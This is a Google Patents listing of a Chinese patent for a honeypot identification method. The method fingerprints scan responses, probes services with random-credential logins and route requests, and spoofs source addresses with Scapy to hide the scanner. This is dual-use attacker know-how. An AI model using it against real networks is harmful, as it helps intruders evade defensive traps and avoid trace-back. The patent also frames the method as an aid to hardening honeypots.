CN114826663A - Honeypot identification method, honeypot identification device, honeypot identification equipment and storage medium - Google Patents

Honeypot identification method, honeypot identification device, honeypot identification equipment and storage medium Download PDF

Info

Publication number
CN114826663A
CN114826663A CN202210269896.8A CN202210269896A CN114826663A CN 114826663 A CN114826663 A CN 114826663A CN 202210269896 A CN202210269896 A CN 202210269896A CN 114826663 A CN114826663 A CN 114826663A
Authority
CN
China
Prior art keywords
target
honeypot
port
identification plug
determining
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Granted
Application number
CN202210269896.8A
Other languages
Chinese (zh)
Other versions
CN114826663B (en
Inventor
方永成
赵重浩
刘茂林
龚亮华
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Fengtai Technology Beijing Co ltd
Original Assignee
Fengtai Technology Beijing Co ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Fengtai Technology Beijing Co ltd filed Critical Fengtai Technology Beijing Co ltd
Priority to CN202210269896.8A priority Critical patent/CN114826663B/en
Publication of CN114826663A publication Critical patent/CN114826663A/en
Application granted granted Critical
Publication of CN114826663B publication Critical patent/CN114826663B/en
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Images

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441Countermeasures against malicious traffic
    • H04L63/1491Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F16/00Information retrieval; Database structures therefor; File system structures therefor
    • G06F16/20Information retrieval; Database structures therefor; File system structures therefor of structured data, e.g. relational data
    • G06F16/25Integrating or interfacing systems involving database management systems
    • G06F16/252Integrating or interfacing systems involving database management systems between a Database Management System and a front-end application
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F16/00Information retrieval; Database structures therefor; File system structures therefor
    • G06F16/90Details of database functions independent of the retrieved data types
    • G06F16/95Retrieval from the web
    • G06F16/953Querying, e.g. by the use of web search engines
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F9/00Arrangements for program control, e.g. control units
    • G06F9/06Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
    • G06F9/44Arrangements for executing specific programs
    • G06F9/445Program loading or initiating
    • G06F9/44521Dynamic linking or loading; Link editing at or after load time, e.g. Java class loading
    • G06F9/44526Plug-ins; Add-ons

Landscapes

  • Engineering & Computer Science (AREA)
  • Theoretical Computer Science (AREA)
  • Databases & Information Systems (AREA)
  • Software Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Physics & Mathematics (AREA)
  • General Physics & Mathematics (AREA)
  • Computer Security & Cryptography (AREA)
  • Data Mining & Analysis (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

The application discloses a honeypot identification method, a honeypot identification device, honeypot identification equipment and a storage medium, and belongs to the field of network security. The method comprises the following steps: firstly, a scanning request is sent to a target port of a target to be identified, and then a scanning response from the target port is obtained. And then determining that the honeypot exists in the target if the field in the scanning response is matched with any characteristic fingerprint in the honeypot fingerprint library. And if the field in the scanning response is determined not to be matched with all the characteristic fingerprints in the honeypot fingerprint library, determining a target honeypot identification plug-in matched with the target port, and determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port. The honeypot fingerprint library comprises characteristic fingerprints of various honeypots, and the target honeypot identification plug-in is used for interacting with the target port. Therefore, honeypots in the targets can be identified through the honeypot fingerprint library or the target honeypot identification plug-in, the types of the identifiable honeypots are more, the universality is better, and the diversity of the honeypots in network security is met.

Description

Honeypot identification method, honeypot identification device, honeypot identification equipment and storage medium
Technical Field
The present application relates to the field of network security, and in particular, to a honeypot identification method, apparatus, device, and storage medium.
Background
With the development of technologies such as internet, internet of things, big data and the like, industries and enterprises apply development directions to online more and more, and network security becomes more and more important. The honeypot identification technology is also called as anti-honeypot technology, is used for identifying honeypots deployed on a defender from the perspective of an attacker, and is an important technical means for defense and attack in the field of network security. For example, from the network detection angle, honeypots are accurately and effectively identified by using honeypot identification technology, so that the network space situation can be mastered, and traps in the network space can be effectively avoided. The honeypot is an active trapping technology, and an attacker is trapped to access by simulating a host system or a port service, so that the behavior of the attacker is captured, monitored and tracked.
However, most of the current researches on honeypot identification technologies are limited to identifying honeypots of a single type, and the identified honeypots are single in type and poor in universality and cannot meet the diversity of honeypots in network security.
Disclosure of Invention
The application provides a honeypot identification method, a honeypot identification device, honeypot identification equipment and a storage medium, which have the advantages of more identifiable honeypots, better universality and capability of meeting the diversity of honeypots in network security. The technical scheme is as follows:
in a first aspect, a honeypot identification method is provided, which is applied to a first device, and includes:
for a target to be identified, sending a scanning request to a target port of the target;
acquiring a scanning response from the target port;
if the fields in the scanning response are determined to be matched with any characteristic fingerprint in a honeypot fingerprint library, determining that honeypots exist in the target, wherein the honeypot fingerprint library comprises the characteristic fingerprints of various honeypots;
and if the fields in the scanning response are determined not to be matched with all the characteristic fingerprints in the honeypot fingerprint library, determining a target honeypot identification plug-in matched with the target port, and determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port, wherein the target honeypot identification plug-in is used for interacting with the target port.
As an example, the interaction policy corresponding to the target honeypot identification plug-in is a target interaction policy, and the target honeypot identification plug-in is used for interacting with the target port according to the target interaction policy;
before determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port, the method further comprises the following steps:
interacting with the target port through the target honeypot identification plug-in according to the target interaction strategy to obtain an interaction result of the target honeypot identification plug-in and the target port;
the determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port comprises:
determining whether the interaction result meets a preset condition;
and if the interaction result meets the preset condition, determining that the honeypots exist in the target.
As an example, the preset condition includes any one of the following conditions:
a first preset field exists in the interaction result;
under the condition that the target interaction strategy is that the target port is logged in for multiple times by using the account and the password which are randomly generated, the target port is logged in for multiple times successfully;
and under the condition that the target interaction strategy is to request different routes for the target port for multiple times, the response results from the target port after the different routes are requested for multiple times are the same.
As one example, the determining a target honeypot identification plug-in that matches the target port includes:
determining a target service provided by the target port;
determining a honeypot identification plug-in matching the target service from a plurality of honeypot identification plug-ins as the target honeypot identification plug-in.
As an example, each honeypot identification plug-in the plurality of honeypot identification plug-ins has a corresponding interaction policy;
the step of determining the honeypot identification plug-in which is matched with the target service from the plurality of honeypot identification plug-ins as the target honeypot identification plug-in comprises any one of the following modes:
if the target service comprises SSH service, FTP service, TELENT service or mySQL service, determining the corresponding interaction strategy from the various honeypot identification plug-ins as the honeypot identification plug-in which the target port is logged in for multiple times by using a randomly generated account number and password;
and if the target service comprises HTTP service and HTTPS service, determining a honeypot identification plug-in with a corresponding interaction strategy of requesting different routes for the target port for multiple times from the multiple honeypot identification plug-ins as the target honeypot identification plug-in.
As an example, the sending the scan request to the target port includes:
generating at least one fake source device address according to the source device address of the first device;
constructing a plurality of scanning requests according to the source device address and the at least one pseudo source device address, wherein the plurality of scanning requests at least comprise a first scanning request and a second scanning request, the first scanning request is a request sent by the source device address, and the second scanning request is a request sent by any pseudo source device address in the at least one pseudo source device address which is forged;
sending the plurality of scan requests to the target port to spoof scan the target port.
As an example, the method further comprises:
downloading a file from the target, extracting a macro code of the file, and determining that a honey pot exists in the target if the honey mark exists in the target according to the macro code;
alternatively, the first and second electrodes may be,
and determining the running process in the target, and if the process name of the running process is determined to have a second preset field, determining that the honeypot exists in the target.
In a second aspect, there is provided a honeypot identification apparatus, the apparatus comprising:
a sending module, configured to send a scan request to a target port of a target to be identified;
an acquisition module for acquiring a scan response from the target port;
a first determination module, configured to determine that a honeypot exists in the target if it is determined that the field in the scan response matches any one of the feature fingerprints in a honeypot fingerprint library, where the honeypot fingerprint library includes feature fingerprints of a plurality of honeypots;
and the second determination module is used for determining a target honeypot identification plug-in matched with the target port if the fields in the scanning response are determined not to be matched with all the characteristic fingerprints in the honeypot fingerprint library, determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port, and the target honeypot identification plug-in is used for interacting with the target port.
As an example, the interaction policy corresponding to the target honeypot identification plug-in is a target interaction policy, and the target honeypot identification plug-in is used for interacting with the target port according to the target interaction policy;
the apparatus further comprises an interaction module:
the interaction module is used for interacting with the target port through the target honeypot identification plug-in according to the target interaction strategy to obtain an interaction result of the target honeypot identification plug-in and the target port;
the second determining module is further configured to determine whether the interaction result meets a preset condition, and if the interaction result meets the preset condition, determine that a honeypot exists in the target.
As an example, the preset condition includes any one of the following conditions:
a first preset field exists in the interaction result;
under the condition that the target interaction strategy is that the target port is logged in for multiple times by using a randomly generated account and a password, the target port is logged in for multiple times successfully;
and under the condition that the target interaction strategy is to request different routes for the target port for multiple times, the response results from the target port after the different routes are requested for multiple times are the same.
As an example, the second determining module is further configured to determine a target service provided by the target port;
determining a honeypot identification plug-in matching the target service from a plurality of honeypot identification plug-ins as the target honeypot identification plug-in.
As an example, each honeypot identification plug-in the plurality of honeypot identification plug-ins has a corresponding interaction policy;
the second determining module is further configured to determine, if the target service includes an SSH service, an FTP service, a tele service, or a mySQL service, a honeypot identification plug-in corresponding to the interaction policy from among the plurality of honeypot identification plug-ins, as the target honeypot identification plug-in, where the honeypot identification plug-in uses a randomly generated account and a password to log in the target port for multiple times;
the second determining module is further configured to determine, if the target service includes an HTTP service and an HTTPs service, a honeypot identification plug-in whose corresponding interaction policy is to request a different route for the target port multiple times from among the multiple honeypot identification plugs as the target honeypot identification plug-in.
As an example, the sending module is further configured to generate at least one fake source device address according to the source device address of the first device;
constructing a plurality of scanning requests according to the source device address and the at least one pseudo source device address, wherein the plurality of scanning requests at least comprise a first scanning request and a second scanning request, the first scanning request is a request sent by the source device address, and the second scanning request is a request sent by any pseudo source device address in the at least one pseudo source device address which is forged;
sending the plurality of scan requests to the target port to spoof scan the target port.
As one example, the apparatus further comprises a third determining module or a fourth determining module:
the third determining module is configured to download a file from the target, extract a macro code of the file, and determine that a honeypot exists in the target if it is determined that a honeybee mark exists in the target according to the macro code;
and the fourth determining module is used for determining the running process in the target, and if the process name of the running process is determined to have the second preset field, determining that the honeypot exists in the target.
In a third aspect, a computer device is provided, the computer device comprising a memory, a processor and a computer program stored in the memory and executable on the processor, the computer program, when executed by the processor, implementing the above honeypot identification method.
In a fourth aspect, a computer-readable storage medium is provided, which stores a computer program that, when executed by a processor, implements the honeypot identification method described above.
The technical scheme provided by the embodiment of the application has the following beneficial effects:
in the embodiment of the application, for the target to be identified, a scanning request is sent to the target port of the target, and then a scanning response from the target port is obtained. And then determining that the honeypot exists in the target if the field in the scanning response is matched with any characteristic fingerprint in the honeypot fingerprint library. And if the field in the scanning response is determined not to be matched with all the characteristic fingerprints in the honeypot fingerprint library, determining a target honeypot identification plug-in matched with the target port, and determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port. The honeypot fingerprint library comprises characteristic fingerprints of various honeypots, and the target honeypot identification plug-in is used for interacting with the target port. The honeypots in the target can be identified by matching the scanning response of the target port with the characteristic fingerprints of the honeypot fingerprint library, and the honeypots in the target can also be identified by the interaction result of the target honeypot identification plug-in and the target port, so that the honeypots which can be identified are more in types and better in universality, and the diversity of the honeypots in network security is met.
Drawings
In order to more clearly illustrate the technical solutions in the embodiments of the present application, the drawings needed to be used in the description of the embodiments are briefly introduced below, and it is obvious that the drawings in the following description are only some embodiments of the present application, and it is obvious for those skilled in the art to obtain other drawings based on these drawings without creative efforts.
Fig. 1 is a flowchart of a honeypot identification method according to an embodiment of the present application;
fig. 2 is a schematic structural diagram of a honeypot identification apparatus provided in an embodiment of the present application;
fig. 3 is a schematic structural diagram of a computer device according to an embodiment of the present application.
Detailed Description
To make the objects, technical solutions and advantages of the present application more clear, embodiments of the present application will be described in further detail below with reference to the accompanying drawings.
It should be understood that reference to "a plurality" in this application means two or more. In the description of the present application, "/" means "or" unless otherwise stated, for example, a/B may mean a or B; "and/or" herein is only an association relationship describing an associated object, and means that there may be three relationships, for example, a and/or B, which may mean: a exists alone, A and B exist simultaneously, and B exists alone. In addition, for the convenience of clearly describing the technical solutions of the present application, the terms "first", "second", and the like are used to distinguish the same items or similar items having substantially the same functions and actions. Those skilled in the art will appreciate that the terms "first," "second," etc. do not denote any order or quantity, nor do the terms "first," "second," etc. denote any order or importance.
Before explaining the embodiments of the present application in detail, an application scenario of the embodiments of the present application will be described.
Attack and defense confrontation is a normal state in the field of network security, and with the improvement of defense technology and attack technology, the network security gradually develops from initial passive defense to active defense. Honeypots, as an active defense technology, are important technical means for detecting threats in defense and attack, gradually attract attention in recent years, and are widely deployed. The honeypot is deployed in a defending party in the attack and defense countermeasure, is an active cheating technology, and can be used for cheating the attacking party in the attack and defense countermeasure to access, further obtaining information such as an equipment address and an account number of the attacking party, even countering the attacking party and controlling equipment of the attacking party.
As an example, the honeypot is deployed in a device of the defender, and the defender may analyze an attack behavior of the attacker by using the honeypot, such as analyzing a scan request of the attacker, and obtain information of a device address, an account, and the like of the attacker according to the scan request.
As an example, honeypots can be classified into low-interaction honeypots, medium-interaction honeypots, and high-interaction honeypots according to their interaction characteristics. The low-interaction honeypot is a honeypot which only simulates some port services, and has a low interaction degree with an attacker. The medium-interaction honeypot is a honeypot which is between a low-interaction honeypot and a high-interaction honeypot, is more real than the low-interaction honeypot, and can simulate more port services. The high-interaction honeypot can simulate a host system, namely simulate an IP (Internet Protocol) address of the host, can interact with equipment of an attacker like a real system, and is most difficult to be identified by the attacker.
Because honeypot trapping is a process of attacking and defending games, from the perspective of an attacker, how to effectively identify honeypots deployed in a defender is achieved, honeypots are avoided, and traps entering the defender are prevented, namely, research on honeypot identification technology has important significance on network security. For example, from the network detection angle, honeypots are accurately and effectively identified by using honeypot identification technology, so that the network space situation can be mastered, and traps in the network space can be effectively avoided.
In addition, the honeypot identification technology is beneficial to pertinently constructing and optimizing honeypots, improving the authenticity of honeypots and improving the identification resistance of honeypots, so that the capability of honeypots for monitoring network security threats is enhanced.
Based on the above, the embodiment of the application provides a honeypot identification method, which can identify more honeypots in types and better in universality and meets the diversity of honeypots in network security.
The honeypot identification method provided by the embodiment of the present application is explained in detail below.
Fig. 1 is a flowchart of a honeypot identification method provided by an embodiment of the present application, where the method may be applied to a first device, and the first device may be a computer device. As shown in fig. 1, the method may include the following steps.
Step 101, for a target to be identified, a first device sends a scan request to a target port of the target.
The first device is a device of an attacker, and the attacker can attack the defender through the first device to identify the honeypots deployed in the defender.
The target to be recognized may refer to the second device of the guardian, or may refer to a port of the second device. The target port of the target refers to a port opened in the target, and the target port of the target may include one or more ports.
The scanning request is used for scanning the target port, so that information such as the state, account or existing vulnerability of the target port is obtained. The state of the target port includes an open state or a closed state, the port in the open state may also be referred to as a live port, and the open state means that the target may communicate through the target port, that is, the target may provide a target service corresponding to the target port through the target port.
For example, the target to be identified is the second device, and before the first device sends the scan request to the target port of the target, the first device may first determine the target device address of the second device, determine that at least one port is opened in the target device address, take each of the at least one port as the target port, and then send the scan request to the target port to scan the target port. The ports are used for providing services, and the services provided by different ports may be the same or different.
The target device address may be one or more of a target IP address, a target MAC (Media Access Control) address, and the like of the second device.
As an example, the first device may perform a port viability test on the target device address, resulting in an open port in the target device address. If it is determined that at least one alive port exists in the address of the target device, each of the at least one alive port is respectively used as a target port, a scan request is sent to the target port, and the following steps 102 to 104 are performed. And if the existence of the surviving port in the target equipment address is determined, storing the target equipment address into a database to be identified so as to carry out port viability test and port scanning on the target equipment address subsequently.
The first device may send a scan request to a destination port of a destination through a wireless communication technology, where the scan request may be transmitted in a message form in a network, and the scan request may include a source device address and a destination device address, where the source device address includes one or more of a source IP address, a source MAC address, and a source port number of the first device, and the destination device address includes one or more of a destination IP address, a destination MAC, and a destination port number of the second device.
As an example, the first device may also send multiple scan requests to the target port. For example, the first device generates at least one fake source device address according to the source device address of the first device, constructs a plurality of scanning requests according to the source device address and the at least one fake source device address, and sends the plurality of scanning requests to the target port to perform spoofing scanning on the target port.
The plurality of scanning requests at least comprise a first scanning request and a second scanning request, the first scanning request is a request sent by a source device address, and the second scanning request is a request sent by any pseudo source device address in at least one pseudo source device address which is forged.
That is, the first scan request is a request sent by the first device, and the first scan request includes a source device address and a target device address. The other scan requests except the first scan request in the plurality of scan requests are requests sent by fake source devices, and the other scan requests except the first scan request in the plurality of scan requests comprise fake source device addresses and target device addresses. Thus, after receiving the multiple scan requests, the second device cannot determine the first device from the multiple scan requests, that is, cannot determine the source device address, and cannot capture, monitor and track the behavior of the first device.
Wherein the pseudo source device address may include one or more of a pseudo source IP address, a pseudo source MAC address, and a pseudo source port number of a fake pseudo source device.
As one example, the first device may program forge at least one pseudo source device address and construct a plurality of scan requests. For example, at least one pseudo source device address is forged by the Scapy program, and a plurality of scan requests are constructed. The Scapy is a Python program, which enables the first device to forge or send network packets, for example forge at least one fake source device address, and send multiple scan requests to the destination port.
As one example, after a first device sends a scan request to a target port of a target, the target (second device) may receive the scan request, generate a scan response from the scan request, and send the scan response to the first device.
At step 102, the first device obtains a scan response from the target port.
If the target port of the target provides the honeypot simulation service, namely the target port is a honeypot simulation port, a field corresponding to the characteristic fingerprint of the honeypot exists in a scanning response message sent by the target to the first device.
The first device can store the characteristic fingerprint corresponding to each honeypot in multiple honeypots in advance. For example, the characteristic fingerprints of various honeypots can be stored in a characteristic fingerprint library.
As an example, please refer to table 1, where table 1 is a comparison table of feature fingerprints of multiple honeypots in a honeypot fingerprint library provided in an embodiment of the present application.
TABLE 1
Figure BDA0003554208890000091
Figure BDA0003554208890000101
The characteristic fingerprint is the core characteristic of the scanning response of the honeypot, and can be used as a reference basis for matching with the field in the scanning response from the target port.
For example, as shown in table 1, if the service provided by the target port is a honeypot simulation service provided by a trunk honeypot, and the feature fingerprint corresponding to the trunk honeypot is "Serial number of module: 88111222", the scan response message sent by the target to the first device must have the field "Serial number of module: 88111222". Or the service provided by the target port is the honeypot simulation service provided by the Conpot honeypot, and the corresponding characteristic fingerprint of the Conpot honeypot is 'Device Identification: Siemens SIMATIC S7-200', the field 'Device Identification: Siemens SIMATIC S7-200' must exist in the scanning response message sent by the target to the first Device.
As an example, honeypot simulation services provided by the same honeypot may also be different. For example, in the pod honeypot in table 1, if it provides honeypot simulation service through the simulation 102 port, the simulation 102 port provides honeypot simulation service corresponding to the S7 protocol. If it provides honeypot simulation services through the simulation 502 port, the simulation 502 port provides honeypot simulation services corresponding to the Conpot protocol.
It should be noted that table 1 is only an example of the honeypot fingerprint library including the feature fingerprints of a plurality of honeypots, and is not limited to the honeypot fingerprint library. For example, the honeypot fingerprint library may include more kinds of characteristic fingerprints of honeypots, or one honeypot may correspond to other characteristic fingerprints, and the embodiment of the present application does not limit the honeypot fingerprint library.
Typically, honeypots included in the honeypot fingerprint library are low-interaction or medium-interaction honeypots. The more types of honeypots included in the honeypot fingerprint library, the more types of honeypots that can be identified by the first device.
After the first device acquires the scan response from the target port, fields in the scan response may be matched with each of the feature fingerprints in the honeypot fingerprint library one by one to determine whether the fields in the scan response match with each of the feature fingerprints in the honeypot fingerprint library, that is, whether a field matching any of the feature fingerprints in the honeypot fingerprint library exists in the scan response.
Step 103, if the first device determines that the field in the scanning response matches any one of the characteristic fingerprints in the honeypot fingerprint library, it determines that honeypots exist in the target.
Wherein the honeypot fingerprint database comprises characteristic fingerprints of various honeypots. For example, as shown in table 1, the honeypot fingerprint database includes characteristic fingerprints corresponding to each honeypot of the plurality of honeypots. The feature fingerprint corresponding to each honeypot is the core feature of the scanning response of the honeypot, and can be used as a reference for matching with the field in the scanning response of the target port.
If the field in the obtained scanning response from the target port is determined to be matched with any characteristic fingerprint in the honeypot fingerprint library by the first device, the target port is determined to provide honeypot simulation service, the target port is a honeypot simulation port, and honeypots exist in targets to be identified.
Because honeypot fingerprint storehouse includes the characteristic fingerprint of multiple honeypot, consequently the multiple honeypot that first equipment can discern, first equipment discernment honeypot kind is more promptly, and the commonality is better, satisfies the variety of honeypot in the network security.
For example, if the first device determines that the scanning response includes the field "Serial number of module: 88111222", it determines that the target port provides the honeypot simulation service and that honeypots exist in the target to be identified.
In addition, the first device may also determine the kind of honeypot present in the target from the library of honeypot fingerprints. For example, the first device determines the type of the honeypot according to the field included in the scan response and the port number corresponding to the scan response.
For example, as shown in table 1, if the first device determines that the target port number is 102 and the obtained scan response includes the field "Serial number of module: 88111222", it may determine that not only honeypots exist in the target, but also honeypots existing in the target are consistent honeypots.
Furthermore, in case the first device determines that the field in the scan response does not match all the characteristic fingerprints in the honeypot fingerprint library, it cannot be determined that the service provided by the target port must not be a honeypot simulation service, i.e. it cannot be determined that there must be no honeypot in the target to be identified. In this case, a greater variety of honeypots can be identified by adding feature fingerprints in the honeypot fingerprint library, or by other means. For example, by interacting with the target port, honeypots are identified during the interaction.
And step 104, if the first device determines that the fields in the scanning response are not matched with all the characteristic fingerprints in the honeypot fingerprint library, determining a target honeypot identification plug-in matched with the target port, and determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port.
Wherein the target honeypot identification plug-in is used for interacting with the target port.
The first equipment is internally and pre-installed with a plurality of honeypot identification plug-ins, each honeypot identification plug-in has a corresponding interaction strategy, and the honeypot identification plug-ins interact with the ports according to the corresponding interaction strategies.
The interaction strategies corresponding to the various honeypot identification plug-ins can be the same or different.
For example, please refer to table 2, where table 2 is a comparison table of honeypot identification plug-in for identifying honeypots provided in the embodiments of the present application.
TABLE 2
Figure BDA0003554208890000121
Figure BDA0003554208890000131
As shown in table 2, the first device may determine a target honeypot identification plug-in matching the target port from a plurality of honeypot identification plugs installed in advance according to the plug-in use condition. Each honeypot identification plug-in the multiple honeypot identification plug-ins has at least one corresponding honeypot identification mode, so that the first device can identify honeypots according to the corresponding honeypot identification modes through the target honeypot identification plug-in.
The service provided by different ports may be different, and the first device may determine, from the plurality of honeypot identification plug-ins, a target honeypot identification plug-in that matches the target port according to the target service provided by the target port.
For example, the first device may determine a target service provided by the target port, and then determine a honeypot identification plug-in matching the target service from the plurality of honeypot identification plugs as the target honeypot identification plug-in.
The target service may include any one of a Secure Shell Protocol (SSH) service, a File Transfer Protocol (FTP) service, a Text service, a mySQL service, a Hypertext Transfer Protocol (HTTP) service, and an Hypertext Transfer Protocol Security (HTTPs) service.
As an example, as shown in table 2, the first device first determines that the target port number of the target port is 3306, and since the 3306 port provides mySQL service, a honeypot identification plug-in matching the mySQL service can be determined from a plurality of honeypot identification plug-ins as the target honeypot identification plug-in.
The honeypot identification mode can comprise an interaction strategy and a honeypot identification mode. That is, each honeypot identification plug-in the plurality of honeypot identification plug-ins has at least one interaction policy and a honeypot identification manner corresponding to the interaction policy. The first device can interact with the port according to the interaction strategy to obtain an interaction result, determine whether the interaction result meets a preset condition according to a honeypot identification mode, and determine that honeypots exist in the target if the interaction result meets the preset condition.
For example, each honeypot identification plug-in the multiple honeypot identification plug-ins has a corresponding interaction policy, and the interaction policy corresponding to the target honeypot identification plug-in is a target interaction policy. The first device may determine a corresponding target service according to the target port, determine a corresponding target interaction policy according to the target service, and determine a honeypot identification plug-in having an interaction policy as the target interaction policy from among the plurality of honeypot identification plugs as the target honeypot identification plug-in.
The interaction policies corresponding to different target services may be the same or different. That is, the target honeypot identification plug-ins determined from the plurality of honeypot identification plug-ins may be the same or different for different target services.
For example, if the target service includes an SSH service, an FTP service, a tele service, or a mySQL service, the interaction policy corresponding to the target service may be that multiple logins are performed on the target port by using a randomly generated account and a password, and the first device may determine, from the multiple honeypot identification plug-ins, that the corresponding interaction policy is that the honeypot identification plug-in that multiple logins are performed on the target port by using a randomly generated account and a password is used as the target honeypot identification plug-in. If the target service includes an HTTP service and an HTTPs service, the interaction policy corresponding to the target service may be a route that requests the target port for a plurality of times and is different, and the first device may determine, from among the plurality of honeypot identification plug-ins, that the corresponding interaction policy is a honeypot identification plug-in that requests the target port for a plurality of times and that requests a different route as the target honeypot identification plug-in.
In the embodiment of the present application, the target service is only an SSH service, an FTP service, a TELENT service, a mySQL service, an HTTP service, or an HTTPs service, and is not limited to the target service. For example, the target service may be any service that can be provided by a computer device in network security, and as shown in table 2, the target service may also be 3389 remote service, Memcach service, or redis service.
The number of the target honeypot identification plug-ins matched with the target ports and the number of the interaction strategies corresponding to the target honeypot identification plug-ins are not limited in the embodiment of the application.
For example, as shown in table 2, the honeypot identification plug-in that matches the mySQL service may include a first target honeypot identification plug-in and a second target honeypot identification plug-in, each honeypot identification plug-in corresponding to an interaction policy. The interaction strategy of the first target honeypot identification plug-in is 'login for a plurality of times by using randomly generated account numbers and passwords', and the interaction strategy of the second target honeypot identification plug-in is 'login for a single time by using randomly generated account numbers and passwords'. Therefore, the first device can interact with the target port according to the corresponding interaction strategies through the first target honeypot identification plug-in and the second target honeypot identification plug-in.
Or only one target honeypot identification plug-in matched with the target port exists, and the target honeypot identification plug-in corresponds to multiple interaction strategies. For example, the honeypot identification plug-in matched with the mySQL service is a third target honeypot identification plug-in, the third target honeypot identification plug-in corresponds to two interaction strategies, the two interaction strategies are respectively a first interaction strategy and a second interaction strategy, the first interaction strategy is that multiple logins are performed on a port by using a randomly generated account and a randomly generated password, and the second interaction strategy is that one login is performed on the port by using a randomly generated account and a randomly generated password. In this way, the first device may interact with the target port according to the first interaction policy and the second interaction policy, which correspond to the third target honeypot identification plug-in.
Different interaction strategies correspond to different interaction results, the same interaction strategy corresponds to the same interaction result, but the honeypot identification modes corresponding to the same interaction strategy may be different.
As an example, the honeypot identification plug-in that matches the mySQL service is a third target honeypot identification plug-in, and the first interaction policy corresponding to the third target honeypot identification plug-in is "log in the port multiple times using a randomly generated account and password". The first interaction strategy corresponds to two modes for identifying honeypots, the first mode for identifying honeypots is that if the interaction result is that the ports are logged in for multiple times successfully, the honeypots exist in the target, and the second mode for identifying honeypots is that if Salt (Salt) existing in the interaction results for multiple times is determined to be the same, the honeypots exist in the target. That is, the ways of identifying honeypots corresponding to the same interaction policy are different.
The second interaction policy corresponding to the third target honeypot identification plug-in is "login once to the port by using a randomly generated account and password", and the honeypot identification manner corresponding to the second interaction policy may be "honeypot exists in the target if login is successful and a" load data local info 'xxx' inter table fields specified by 'n' field exists in the interaction result ".
It should be noted that, because the first device is provided with a plurality of honeypot identification plug-ins, each honeypot identification plug-in corresponds to one or more interaction strategies, the first device can identify honeypots of different types according to the one or more interaction strategies of each honeypot identification plug-in of the plurality of honeypot identification plug-ins, that is, the first device can identify honeypots of more types.
In addition, the greater the number of honeypot identification plug-ins installed in the first device, the greater the number of interaction strategies corresponding to each honeypot identification plug-in, and the greater the types of honeypots that can be identified by the first device.
The interaction strategy corresponding to the target honeypot identification plug-in is a target interaction strategy, and the target honeypot identification plug-in is used for interacting with the target port according to the target interaction strategy. Before the first device determines that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port, the first device can interact with the target port through the target honeypot identification plug-in according to a target interaction strategy to obtain the interaction result of the target honeypot identification plug-in and the target port. Then, the first device may first determine whether the interaction result meets a preset condition, and if the interaction result meets the preset condition, determine that the target port provides honeypot simulation service, and determine that honeypots exist in the target.
Wherein the preset condition comprises any one of the following conditions:
(1) a first preset field exists in the interaction result;
(2) under the condition that the target interaction strategy is that the target port is logged in for multiple times by using the randomly generated account and the password, the target port is logged in for multiple times successfully;
(3) and under the condition that the target interaction strategy is to request different routes for the target port for multiple times, the response results from the target port after the different routes are requested for multiple times are the same.
For example, the first device determines whether the interaction result meets the preset condition according to the honeypot identification mode corresponding to the target interaction policy.
For example, as shown in table 2, if the target port number is 3306, the target service corresponding to the target port is mySQL service. If the interaction policy corresponding to the mySQL service is "login the port once by using the account and the password which are randomly generated", the first device may interact with the target port according to the interaction policy. If the field of ' load data local outline ' xxx ' internal table fields specified by ' \ n ' exists in the interaction result, determining that the object has the honeypot.
Or, if the interaction policy corresponding to the mySQL service is "multiple logins to the port by using a randomly generated account and password", the first device interacts with the target port according to the interaction policy. And if the interaction result is that the ports are logged in for multiple times successfully, determining that the honeypots exist in the target.
For example, if the destination port number is 1 to 65535, the destination service corresponding to the destination port is an HTTP or HTTPs service. And if the interaction strategy corresponding to the HTTP or HTTPS service is 'different routes for multiple requests of the target port', the first equipment interacts with the target port according to the interaction strategy. And if the interactive result is that the hash values in the response results of the target ports after the multiple requests of different routes are the same, determining that the honeypots exist in the target.
As an example, the first device may also determine a target honeypot identification plug-in that matches the target port according to the port number of the target port. For example, as shown in table 2, if the destination port number is 1-65535, the honeypot identification plug-in with the interaction policy "request different routes for the destination port multiple times" is determined from the multiple honeypot identification plugs as the destination honeypot identification plug-in, or the honeypot identification plug-in with the interaction policy "perform TCP three-way handshake with the port" is determined from the multiple honeypot identification plugs as the destination honeypot identification plug-in.
As an example, the first device may also determine a target honeypot identification plug-in matching the target port according to the scan response from the target port obtained in step 102. For example, as shown in table 2, if there is a "GPON" field in the scan response, the honeypot identification plug having the interaction policy "request any route for the target port multiple times" is determined as the target honeypot identification plug from the multiple honeypot identification plugs.
In addition, the first device may also determine the kind (type) of honeypots present in the target through a honeypot identification plug-in. For example, the kind of honeypot is determined according to the port number and the interaction policy.
